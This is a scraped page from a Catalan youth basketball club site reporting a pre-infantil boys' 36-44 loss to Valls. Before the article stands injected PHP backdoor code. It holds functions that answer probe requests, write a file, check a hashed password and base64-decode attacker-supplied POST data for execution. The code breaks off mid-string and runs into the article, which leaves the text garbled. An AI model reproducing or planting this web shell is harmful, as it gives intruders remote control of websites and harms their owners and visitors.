function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Massa errades del preinfantil masculí contra el Valls (36-44) - Tgn Bàsquet Club -

Massa errades del preinfantil masculí contra el Valls (36-44)

Updated: gener 26, 2014

El preinfantil masculí del TGN Bàsquet va perdre contra el Valls en un partit marcat per desencert de cara a cistella dels dos equips. Els dos conjunts van provar de córrer des del primer minut i va ser el conjunt vallenc qui en va sortir més afavorit. Després del descans, el cúmul de pilotes perdudes dels locals van provocar un parcial de 2-12 que permetia els visitants arribar a l’últim període 17 punts per davant. Els locals, però, no van perdre la fe i van intentar remuntar. Les errades en els tirs lliures, però, van impedir la remuntada.